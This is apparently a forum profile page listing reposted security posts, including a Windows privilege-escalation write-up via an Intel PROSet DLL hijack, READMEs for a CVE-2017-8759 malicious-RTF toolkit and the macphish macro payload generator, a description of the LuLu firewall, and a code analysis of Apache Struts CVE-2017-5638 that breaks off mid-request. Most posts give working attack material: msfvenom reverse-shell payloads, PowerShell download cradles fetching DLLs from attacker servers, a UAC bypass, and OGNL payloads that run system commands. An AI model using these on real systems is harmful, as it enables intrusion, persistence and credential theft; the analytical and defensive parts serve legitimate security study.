Jump to content

Nytro

Administrators
  • Posts

    18740
  • Joined

  • Last visited

  • Days Won

    711

Everything posted by Nytro

  1. SYSTEM-level Persistence via Intel PROSet Wireless RpcRtRemote.dll Backdoor Posted on March 17, 2017 by x4zx ** update 4/14/2017: powershell exploit code: https://github.com/0rbz/Intel_Inside The Intel PROSet Wireless connection management software is vulnerable to DLL hijack which results in privilege escalation, and SYSTEM level persistence via a backdoored “RpcRtRemote.dll” file. To execute this particular attack, we’ll chain it together with a CompMgmtLauncher.exe UAC Bypass (similar to enigma0x3’s and others’ work) to gain elevated permissions in order to write our backdoored file into the required location at “C:\Program Files\Common Files\Intel\WirelessCommon\” The issue arises when “C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe” (a system level service) calls “RpcRtRemote.dll” within the same directory, which doesn’t exist on a default installation of the package. This allows us to supply our own backdoored dll, which we’ll execute manually for system-level privileges, but it also will give us system-level reverse_https meterpreter persistence at every system boot up since RegSrvc.exe runs as a local system service at boot time. This was tested on a fully patched 64-bit Windows 7 machine with the 64-bit version of the PROSet Wireless Package (“Wireless_19.40.0_PROSet64_Win7.exe”), and we’ll use 64-bit reverse_https meterpreter dll payload. This also probably works with x86, but the 64-bit dll offers us a bit more “evasion” when it comes to antivirus detection capabilities. This specific attack vector is also handy in regards to having a somewhat discreet sidechannel out of a target network. This also assumes you already have a reverse https meterpreter shell on a box as user in the local administrators group, with UAC enabled to anything but “Always Notify”, and just need another method to “getsystem” on your target. A vulnerable host should have the “RegSrvc.exe” process running, so check it with something like: tasklist |find "RegSrvc.exe" The resource file settings i’m using for for the listener is something like: intel.rc: use exploit/multi/handler set ExitOnSession false set LHOST 0.0.0.0 set LPORT 5555 set PAYLOAD windows/x64/meterpreter/reverse_https set HandlerSSLCert custom.pem exploit -j The first step is to create your 64-bit backdoored RpcRtRemote.dll file: msfvenom -p windows/x64/meterpreter/reverse_https -f dll LHOST=192.168.13.26 LPORT=5555 > RpcRtRemote.dll Host the above DLL on a web server you control. We'll use powershell to bring it down to the target directory later. Create the following powershell script, and also host it on a web server you control. Point the "$pl_url" variable to your backdoored RpcRtRemote.dll file: RpcRtRemote_downloader.ps1: $dlx = New-Object System.Net.WebClient $pl_url = 'https://x42.obscurechannel.com/RpcRtRemote.dll'; $lfile = 'C:\Program Files\Common Files\Intel\WirelessCommon\RpcRtRemote.dll'; $dlx.DownloadFile($pl_url,$lfile); Let's test. From your UAC restricted admin shell, execute the following: (this could all be scripted into a powershell or metasploit module!) This executes a CompMgmtLauncher.exe UAC bypass via wmic (because it works) and downloads our backdoored RpcRtRemote.dll (64 bit reverse_https meterpreter payload) and copies it to the WirelessCommon Directory using a powershell download cradle: reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep Bypass -windowstyle hidden -nop iex -Command (New-Object Net.WebClient).DownloadString('https://yourserver.com/RpcRtRemote_downloader.ps1')" /f wmic process call create "cmd.exe /c C:\windows\system32\CompMgmtLauncher.exe" Wait before running the next step, the dll download may take a few seconds depending on its size, bandwidth, etc. Re-execute the UAC bypass to re-launch "RegSrvc.exe" as an elevated process: reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe" /f wmic process call create "cmd.exe /c C:\windows\system32\CompMgmtLauncher.exe" clean up: reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f At this point, you should have gotten a new elevated meterpreter session and should be able to execute a "getsystem" command. This will also persist as a NT AUTHORITY/SYSTEM level shell upon every reboot. The flow: Defenders: Configure UAC to "Always Notify" Remove users from the local administrators group Monitor for rogue connections originating from rundll32.exe (only effective if the attacker doesn't migrate to another valid process) - @0rbz_ Sursa: https://www.obscurechannel.com/x42/?p=378
      • 1
      • Upvote
  2. Exploit toolkit CVE-2017-8759 - v1.0 Exploit toolkit CVE-2017-8759 - v1.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft .NET Framework RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter / other payload to victim without any complex configuration. Disclaimer This program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (bhdresh) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using this program you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not bhdresh's responsibility. Release note: Introduced following capabilities to the script - Generate Malicious RTF file - Exploitation mode for generated RTF file Version: Python version 2.7.13 Scenario: Deliver local meterpreter payload Video Tutorial: Example commands 1) Generate malicious RTF file # python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt 2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run" 3) Start toolkit in exploit mode to deliver local payload # python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe Command line arguments: # python cve-2017-8759_toolkit.py -h This is a handy toolkit to exploit CVE-2017-8759 (Microsoft .NET Framework RCE) Modes: -M gen Generate Malicious file only Generate malicious RTF/PPSX file: -w <Filename.rtf> Name of malicious RTF file (Share this file with victim). -u <http://attacker.com/test.txt> Path of remote txt file. Normally, this should be a domain or IP where this tool is running. For example, http://attackerip.com/test.txt (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF file. -M exp Start exploitation mode Exploitation: -p <TCP port:Default 80> Local port number. -e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target. -l </tmp/shell.exe> Specify local path of an executable file / meterpreter shell / payload. Author @bhdresh Credit @Voulnet, @vysec, @bhdresh Sursa: https://github.com/bhdresh/CVE-2017-8759
  3. macphish Office for Mac Macro Payload Generator Attack vectors There are 4 attack vectors available: beacon creds meterpreter meterpreter-grant For the 'creds' method, macphish can generate the Applescript script directly, in case you need to run it from a shell. beacon On execution, this payload will signal our listening host and provide basic system information about the victim. The simplest way of generating a beacon payload is: $./macphish.py -lh <listening host> By default, it uses curl but other utilities (wget, nslookup) can be used by modifying the command template. creds $./macphish.py -lh <listening host> -lp <listening port> -a creds meterpreter The simplest way of generating a meterpreter payload is: $./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter meterpreter-grant The generate a meterpreter payload that calls GrantAccessToMultipleFiles() first: $./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant For meterpreter attacks, only python payloads are supported at the moment. Sursa: https://github.com/cldrn/macphish
  4. LuLu ⚠ please note: LuLu is currently in alpha. This means it is currently under active development and still contains known bugs. As such, installing it on any production systems is not recommended at this time! Also, as with any security tool, proactive attempts to specifically bypass LuLu's protections will likely succeed. By design, LuLu (currently) implements only limited 'self-defense' mechanisms. LuLu is the free open-source macOS firewall that aims to block unauthorized (outgoing) network traffic, unless explicitly approved by the user: Full details and usage instructions can be found here. To Build LuLu should build cleanly in Xcode (though you will have remove code signing constrains, or replace with you own Apple developer/kernel code signing certificate). To Install For now, LuLu must be installed via the command-line. Build LuLu or download the pre-built binaries/components from the deploy directory (LuLu.zip contains everything), then execute the configuration script (configure.sh) with the -install flag, as root: //install $ sudo configure.sh -install Link: https://github.com/objective-see/LuLu
      • 1
      • Thanks
  5. An Analysis of CVE-2017-5638 Monday, March 27, 2017 at 12:10PM At GDS, we’ve had a busy few weeks helping our clients manage the risk associated with CVE-2017-5638 (S2-045), a recently published Apache Struts server-side template injection vulnerability. As we began this work, I found myself curious about the conditions that lead to this vulnerability in the Struts library code. We often hear about the exploitation of these types of vulnerabilities, but less about the vulnerable code that leads to them. This post is the culmination of research I have done into this very topic. What I present here is a detailed code analysis of the vulnerability, as well as payloads seen in the wild and a discussion on why some work while others don’t. I also present a working payload for S2-046, an alternate exploit vector that is capable of bypassing web application firewall rules that only examine request content types. I conclude with a couple of takeaways I had from this research. For those unfamiliar with the concept of SSTI (server-side template injection), it’s a classic example of an injection attack. A template engine parses what is intended to be template code, but somewhere along the way ends up parsing user input. The result is typically code execution in whatever form the template engine allows. For many popular template engines, such as Freemarker, Smarty, Velocity, Jade, and others, remote code execution outside of the engine is often possible (i.e. spawning a system shell). For cases like Struts, simple templating functionality is provided using an expression language such as Object-Graph Navigation Language (OGNL). As is the case for OGNL, it is often possible to obtain remote code execution outside of an expression engine as well. Many of these libraries do offer mechanisms to help mitigate remote code execution, such as sandboxing, but they tend to be disabled by default or trivial to bypass. From a code perspective, the simplest condition for SSTI to exist in an application is to have user input passed into a function that parses template code. Losing track of what functions handle values tainted with user input is an easy way to accidentally introduce all kinds of injection vulnerabilities into an application. To uncover a vulnerability like this, the call stack and any tainted data flow must be carefully traced and analyzed. This was the case to fully understand how CVE-2017-5638 works. The official CVE description reads: The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 mishandles file upload, which allows remote attackers to execute arbitrary commands via a #cmd= string in a crafted Content-Type HTTP header, as exploited in the wild in March 2017. This left me with the impression that the vulnerable code existed in the Jakarta Multipart parser and that it was triggered by a “#cmd=” string in the Content-Type HTTP header. Using Struts 2.5.10 as an example, we’ll soon learn that the issue is far more nuanced than that. To truly grasp how the vulnerability works, I needed to do a full analysis of relevant code in the library. Beginning With A Tainted Exception Message An exception thrown, caught, and logged when this vulnerability is exploited reveals a lot about how this vulnerability works. As we can see in the following reproduction, which results in remote code execution, an exception is thrown and logged in the parseRequest method in the Apache commons upload library. This is because the content-type of the request didn’t match an expected valid string. We also notice that the exception message thrown by this library includes the invalid content-type header supplied in the HTTP request. This in effect taints the exception message with user input. Reproduction Request: POST /struts2-showcase/fileupload/doUpload.action HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: ${(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} Content-Length: 0 Reproduction Response: HTTP/1.1 200 OK Set-Cookie: JSESSIONID=16cuhw2qmanji1axbayhcp10kn;Path=/struts2-showcase Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Jetty(8.1.16.v20140903) Content-Length: 11 testwebuser Logged Exception: 2017-03-24 13:44:39,625 WARN [qtp373485230-21] multipart.JakartaMultiPartRequest (JakartaMultiPartRequest.java:69) - Request exceeded size limit! org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/mixed stream, content type header is ${(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} at org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl.(FileUploadBase.java:948) ~[commons-fileupload-1.3.2.jar:1.3.2] at org.apache.commons.fileupload.FileUploadBase.getItemIterator(FileUploadBase.java:310) ~[commons-fileupload-1.3.2.jar:1.3.2] at org.apache.commons.fileupload.FileUploadBase.parseRequest(FileUploadBase.java:334) ~[commons-fileupload-1.3.2.jar:1.3.2] at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parseRequest(JakartaMultiPartRequest.java:147) ~[struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.processUpload(JakartaMultiPartRequest.java:91) ~[struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parse(JakartaMultiPartRequest.java:67) [struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.multipart.MultiPartRequestWrapper.(MultiPartRequestWrapper.java:86) [struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.Dispatcher.wrapRequest(Dispatcher.java:806) [struts2-core-2.5.10.jar:2.5.10] [..snip..] The caller responsible for invoking the parseRequest method that generates the exception is in a class named JakartaMultiPartRequest. This class acts as a wrapper around the Apache commons fileupload library, defining a method named processUpload that calls its own version of the parseRequest method on line 91. This method creates a new ServletFileUpload object on line 151 and calls its parseRequest method on line 147. core/src/main/java/org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest.java: 90: protected void processUpload(HttpServletRequest request, String saveDir) throws FileUploadException, UnsupportedEncodingException { 91: for (FileItem item : parseRequest(request, saveDir)) { 92: LOG.debug("Found file item: [{}]", item.getFieldName()); 93: if (item.isFormField()) { 94: processNormalFormField(item, request.getCharacterEncoding()); 95: } else { 96: processFileField(item); 97: } 98: } 99: } [..snip..] 144: protected List<FileItem> parseRequest(HttpServletRequest servletRequest, String saveDir) throws FileUploadException { 145: DiskFileItemFactory fac = createDiskFileItemFactory(saveDir); 146: ServletFileUpload upload = createServletFileUpload(fac); 147: return upload.parseRequest(createRequestContext(servletRequest)); 148: } 149: 150: protected ServletFileUpload createServletFileUpload(DiskFileItemFactory fac) { 151: ServletFileUpload upload = new ServletFileUpload(fac); 152: upload.setSizeMax(maxSize); 153: return upload; 154: } Looking at the stacktrace, we can see that the processUpload method is called by JakartaMultiPartRequest’s parse method on line 67. Any thrown exceptions from calling this method are caught on line 68 and passed to the method buildErrorMessage. Several paths exist for calling this method depending on the class of the exception thrown, but the result is always that this method is called. In this case the buildErrorMessage method is called on line 75. core/src/main/java/org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest.java: 64: public void parse(HttpServletRequest request, String saveDir) throws IOException { 65: try { 66: setLocale(request); 67: processUpload(request, saveDir); 68: } catch (FileUploadException e) { 69: LOG.warn("Request exceeded size limit!", e); 70: LocalizedMessage errorMessage; 71: if(e instanceof FileUploadBase.SizeLimitExceededException) { 72: FileUploadBase.SizeLimitExceededException ex = (FileUploadBase.SizeLimitExceededException) e; 73: errorMessage = buildErrorMessage(e, new Object[]{ex.getPermittedSize(), ex.getActualSize()}); 74: } else { 75: errorMessage = buildErrorMessage(e, new Object[]{}); 76: } 77: 78: if (!errors.contains(errorMessage)) { 79: errors.add(errorMessage); 80: } 81: } catch (Exception e) { 82: LOG.warn("Unable to parse request", e); 83: LocalizedMessage errorMessage = buildErrorMessage(e, new Object[]{}); 84: if (!errors.contains(errorMessage)) { 85: errors.add(errorMessage); 86: } 87: } 88: } Since the JakartaMultiPartRequest class doesn’t define the buildErrorMessage method, we look to the class that it extends which does: AbstractMultiPartRequest. core/src/main/java/org/apache/struts2/dispatcher/multipart/AbstractMultiPartRequest.java: 98: protected LocalizedMessage buildErrorMessage(Throwable e, Object[] args) { 99: String errorKey = "struts.messages.upload.error." + e.getClass().getSimpleName(); 100: LOG.debug("Preparing error message for key: [{}]", errorKey); 101: 102: return new LocalizedMessage(this.getClass(), errorKey, e.getMessage(), args); 103: } The LocalizedMessage that it returns defines a simple container-like object. The important details here are: The instance’s textKey is set to a struts.messages.upload.error.InvalidContentTypeException. The instance’s defaultMessage is set to the exception message tainted with user input. Next in the stacktrace, we can see that JakartaMultiPartRequest’s parse method is invoked in MultiPartRequestWrapper’s constructor method on line 86. The addError method called on line 88 checks to see if the error has already been seen, and if not it adds it to an instance variable that holds a collection of LocalizedMessage objects. core/src/main/java/org/apache/struts2/dispatcher/multipart/MultiPartRequestWrapper.java: 77: public MultiPartRequestWrapper(MultiPartRequest multiPartRequest, HttpServletRequest request, 78: String saveDir, LocaleProvider provider, 79: boolean disableRequestAttributeValueStackLookup) { 80: super(request, disableRequestAttributeValueStackLookup); [..snip..] 85: try { 86: multi.parse(request, saveDir); 87: for (LocalizedMessage error : multi.getErrors()) { 88: addError(error); 89: } On the next line of our stacktrace, we see that the Dispatcher class is responsible for instantiating a new MultiPartRequestWrapper object and calling the constructor method above. The method called here is named wrapRequest and is responsible for detecting if the request’s content type contains the substring “multipart/form-data” on line 801. If it does, a new MultiPartRequestWrapper is created on line 804 and returned. core/src/main/java/org/apache/struts2/dispatcher/Dispatcher.java: 794: public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException { 795: // don't wrap more than once 796: if (request instanceof StrutsRequestWrapper) { 797: return request; 798: } 799: 800: String content_type = request.getContentType(); 801: if (content_type != null && content_type.contains("multipart/form-data")) { 802: MultiPartRequest mpr = getMultiPartRequest(); 803: LocaleProvider provider = getContainer().getInstance(LocaleProvider.class); 804: request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider, disableRequestAttributeValueStackLookup); 805: } else { 806: request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup); 807: } 808: 809: return request; 810: } At this point in our analysis, our HTTP request has been parsed and our wrapped request object (MultiPartRequestWrapper) holds an error (LocalizedMessage) with our tainted default message and a textKey set to struts.messages.upload.error.InvalidContentTypeException. Calling Struts’ File Upload Interceptor The rest of the stacktrace doesn’t provide anything terribly useful to us to continue tracing data flow. However, we have a clue for where to look next. Struts processes requests through a series of interceptors. As it turns out, an interceptor named FileUploadInterceptor is part of the default “stack” that Struts is configured to use. As we can see on line 242, the interceptor checks to see if our request object is an instance of the class MultiPartRequestWrapper. We know that it is because the Dispatcher previously returned an instance of this class. The interceptor continues to check if the MultiPartRequestWrapper object has any errors on line 261, which we already know it does. It then calls LocalizedTextUtil’s findText method on line 264, passing in several arguments such as the error’s textKey and our tainted defaultMessage. core/src/main/java/org/apache/struts2/interceptor/FileUploadInterceptor.java: 237: public String intercept(ActionInvocation invocation) throws Exception { 238: ActionContext ac = invocation.getInvocationContext(); 239: 240: HttpServletRequest request = (HttpServletRequest) ac.get(ServletActionContext.HTTP_REQUEST); 241: 242: if (!(request instanceof MultiPartRequestWrapper)) { 243: if (LOG.isDebugEnabled()) { 244: ActionProxy proxy = invocation.getProxy(); 245: LOG.debug(getTextMessage("struts.messages.bypass.request", new String[]{proxy.getNamespace(), proxy.getActionName()})); 246: } 247: 248: return invocation.invoke(); 249: } 250: [..snip..] 259: MultiPartRequestWrapper multiWrapper = (MultiPartRequestWrapper) request; 260: 261: if (multiWrapper.hasErrors()) { 262: for (LocalizedMessage error : multiWrapper.getErrors()) { 263: if (validation != null) { 264: validation.addActionError(LocalizedTextUtil.findText(error.getClazz(), error.getTextKey(), ActionContext.getContext().getLocale(), error.getDefaultMessage(), error.getArgs())); 265: } 266: } 267: } Following Localized Text This is where things start to get interesting. A version of the LocalizedTextUtil’s method findText is called that tries to find an error message to return based on several factors. I have omitted the large method definition because the comment below accurately describes it. The findText method call is invoked where: aClassName is set to AbstractMultiPartRequest. aTextName is set to the error’s textKey, which is struts.messages.upload.error.InvalidContentTypeException. Locale is set to the ActionContext’s locale. defaultMessage is our tainted exception message as a string. Args is an empty array. valueStack is set to the ActionContext’s valueStack. 397: /** 398: * <p> 399: * Finds a localized text message for the given key, aTextName. Both the key and the message 400: * itself is evaluated as required. The following algorithm is used to find the requested 401: * message: 402: * </p> 403: * 404: * <ol> 405: * <li>Look for message in aClass' class hierarchy. 406: * <ol> 407: * <li>Look for the message in a resource bundle for aClass</li> 408: * <li>If not found, look for the message in a resource bundle for any implemented interface</li> 409: * <li>If not found, traverse up the Class' hierarchy and repeat from the first sub-step</li> 410: * </ol></li> 411: * <li>If not found and aClass is a {@link ModelDriven} Action, then look for message in 412: * the model's class hierarchy (repeat sub-steps listed above).</li> 413: * <li>If not found, look for message in child property. This is determined by evaluating 414: * the message key as an OGNL expression. For example, if the key is 415: * <i>user.address.state</i>, then it will attempt to see if "user" can be resolved into an 416: * object. If so, repeat the entire process fromthe beginning with the object's class as 417: * aClass and "address.state" as the message key.</li> 418: * <li>If not found, look for the message in aClass' package hierarchy.</li> 419: * <li>If still not found, look for the message in the default resource bundles.</li> 420: * <li>Return defaultMessage</li> 421: * </ol> Because a resource bundle is not found defining an error message for struts.messages.upload.error.InvalidContentTypeException, this process ends up invoking the method getDefaultMessage on line 573: core/src/main/java/com/opensymphony/xwork2/util/LocalizedTextUtil.java: 570: // get default 571: GetDefaultMessageReturnArg result; 572: if (indexedTextName == null) { 573: result = getDefaultMessage(aTextName, locale, valueStack, args, defaultMessage); 574: } else { 575: result = getDefaultMessage(aTextName, locale, valueStack, args, null); 576: if (result != null &amp;&amp; result.message != null) { 577: return result.message; 578: } 579: result = getDefaultMessage(indexedTextName, locale, valueStack, args, defaultMessage); 580: } The getDefaultMessage method in the same class is responsible making one last ditch effort of trying to find a suitable error message given a key and a locale. In our case, it still fails and takes our tainted exception message and calls TextParseUtil’s translateVariables method on line 729. core/src/main/java/com/opensymphony/xwork2/util/LocalizedTextUtil.java: 714: private static GetDefaultMessageReturnArg getDefaultMessage(String key, Locale locale, ValueStack valueStack, Object[] args, 715: String defaultMessage) { 716: GetDefaultMessageReturnArg result = null; 717: boolean found = true; 718: 719: if (key != null) { 720: String message = findDefaultText(key, locale); 721: 722: if (message == null) { 723: message = defaultMessage; 724: found = false; // not found in bundles 725: } 726: 727: // defaultMessage may be null 728: if (message != null) { 729: MessageFormat mf = buildMessageFormat(TextParseUtil.translateVariables(message, valueStack), locale); 730: 731: String msg = formatWithNullDetection(mf, args); 732: result = new GetDefaultMessageReturnArg(msg, found); 733: } 734: } 735: 736: return result; 737: } An OGNL Expression Data Sink As it turns out, TextParseUtil’s translateVariables method is a data sink for expression language evaluation. Just as the method’s comment explains, it provides simple template functionality by evaluating OGNL expressions wrapped in instances of ${…} and %{…}. Several versions of the translateVariables method are defined and called, with the last evaluating the expression on line 166. core/src/main/java/com/opensymphony/xwork2/util/TextParseUtil.java: 34: /** 35: * Converts all instances of ${...}, and %{...} in <code>expression</code> to the value returned 36: * by a call to {@link ValueStack#findValue(java.lang.String)}. If an item cannot 37: * be found on the stack (null is returned), then the entire variable ${...} is not 38: * displayed, just as if the item was on the stack but returned an empty string. 39: * 40: * @param expression an expression that hasn't yet been translated 41: * @param stack value stack 42: * @return the parsed expression 43: */ 44: public static String translateVariables(String expression, ValueStack stack) { 45: return translateVariables(new char[]{'$', '%'}, expression, stack, String.class, null).toString(); 46: } [..snip..] 152: public static Object translateVariables(char[] openChars, String expression, final ValueStack stack, final Class asType, final ParsedValueEvaluator evaluator, int maxLoopCount) { 153: 154: ParsedValueEvaluator ognlEval = new ParsedValueEvaluator() { 155: public Object evaluate(String parsedValue) { 156: Object o = stack.findValue(parsedValue, asType); 157: if (evaluator != null && o != null) { 158: o = evaluator.evaluate(o.toString()); 159: } 160: return o; 161: } 162: }; 163: 164: TextParser parser = ((Container)stack.getContext().get(ActionContext.CONTAINER)).getInstance(TextParser.class); 165: 166: return parser.evaluate(openChars, expression, ognlEval, maxLoopCount); 167: } With this last method call, we have traced an exception message tainted with user input all the way to the evaluation of OGNL. Payload Analysis A curious reader might be wondering how the exploit’s payload works. To start, let us first attempt to supply a simple OGNL payload that returns an additional header. We need to include the unused variable in the beginning, so that Dispatcher’s check for a “multipart/form-data” substring passes and our request gets parsed as a file upload. Reproduction Request: POST /struts2-showcase/fileupload/doUpload.action HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: ${(#_='multipart/form-data').(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Struts-Exploit-Test','GDSTEST'))} Content-Length: 0 Reproduction Response: HTTP/1.1 200 OK Set-Cookie: JSESSIONID=1wq4m7r2pkjqfak2zaj4e12kn;Path=/struts2-showcase Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html [..snip..] Huh? It didn’t work. A look at our logs shows a warning was logged: Logged Exception: 17-03-24 12:48:30,904 WARN [qtp18233895-25] ognl.SecurityMemberAccess (SecurityMemberAccess.java:74) - Package of target [com.opensymphony.sitemesh.webapp.ContentBufferingResponse@9f1cfe2] or package of member [public void javax.servlet.http.HttpServletResponseWrapper.addHeader(java.lang.String,java.lang.String)] are excluded! As it turns out, Struts offers blacklisting functionality for class member access (i.e. class methods). By default, the following class lists and regular expressions are used: core/src/main/resources/struts-default.xml: 41: <constant name="struts.excludedClasses" 42: value=" 43: java.lang.Object, 44: java.lang.Runtime, 45: java.lang.System, 46: java.lang.Class, 47: java.lang.ClassLoader, 48: java.lang.Shutdown, 49: java.lang.ProcessBuilder, 50: ognl.OgnlContext, 51: ognl.ClassResolver, 52: ognl.TypeConverter, 53: ognl.MemberAccess, 54: ognl.DefaultMemberAccess, 55: com.opensymphony.xwork2.ognl.SecurityMemberAccess, 56: com.opensymphony.xwork2.ActionContext"> 57: [..snip..] 63: <constant name="struts.excludedPackageNames" value="java.lang.,ognl,javax,freemarker.core,freemarker.template" > To better understand the original OGNL payload, let us try a simplified version that actually works: Reproduction Request: POST /struts2-showcase/fileupload/doUpload.action HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: ${(#_='multipart/form-data').(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Struts-Exploit-Test','GDSTEST'))}} Content-Length: 0 Reproduction Response: HTTP/1.1 200 OK Set-Cookie: JSESSIONID=avmifel7x66q9cmnsrr8lq0s;Path=/struts2-showcase Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Struts-Exploit-Test: GDSTEST Content-Type: text/html [..snip..] As we can see, this one does indeed work. But how is it bypassing the blacklisting we saw earlier? What this payload does is empty the list of excluded package names and classes, thereby rendering the blacklist useless. It does this by first fetching the current container associated with the OGNL context and assigning it to the “container” variable. You may notice that the class com.opensymphony.xwork2.ActionContext is included in the blacklist above. How is this possible then? The blacklist doesn’t catch it because we aren’t referencing a class member, but rather by a key that already exists in the OGNL Value Stack (defined in core/src/main/java/com/opensymphony/xwork2/ActionContext.java:102). The reference to an instance of this class is already made for us, and the payload takes advantage of this. Next, the payload gets the container’s instance of OgnlUtil, which allows us to invoke methods that return the current excluded classes and package names. The final step is to simply get and clear each blacklist and execute whatever unrestricted evaluations we want. An interesting point to make here is that once the blacklists have been emptied, they remain empty until overwritten by code or until the application has been restarted. I found this to be a common pitfall when attempting to reproduce certain payloads found in the wild or documented in other research. Some payloads failed to work because they assumed the blacklists had already been emptied, which would have likely occurred during the testing of different payloads earlier on. This emphasizes the importance of resetting application state when running dynamic tests. You may have also noticed that the original exploit’s payload used is a bit more complicated than the one presented here. Why does it perform extra steps such as checking a _memberAccess variable and calling a method named setMemberAccess? It may be an attempt to leverage another technique to clear each blacklist, just in case the first technique didn’t work. The setMemberAccess method is called with a default instance of the MemberAcess class, which in effect clears each blacklist too. I could confirm that this technique works in Struts 2.3.31 but not 2.5.10. I am still unsure, however, of what the purpose is of the ternary operator that checks for and conditionally assigns _memberAccess. During testing I did not observe this variable to evaluate as true. Other Exploit Vectors Other exploit vectors exist for this vulnerability as of 2.5.10. This is due to the fact that any exception message tainted with user input that doesn’t have an associated error key will be evaluated as OGNL. For example, supplying an upload filename with a null byte will cause an InvalidFileNameException exception to be thrown from the Apache commons fileupload library. This would also bypass a web application firewall rule examining the content-type header. The %00 in the request below should be URL decoded first. The result is an exception message that is tainted with user input. Reproduction Request: POST /struts2-showcase/ HTTP/1.1 Host: localhost:8080 Content-Type: multipart/form-data; boundary=---------------------------1313189278108275512788994811 Content-Length: 570 -----------------------------1313189278108275512788994811 Content-Disposition: form-data; name="upload"; 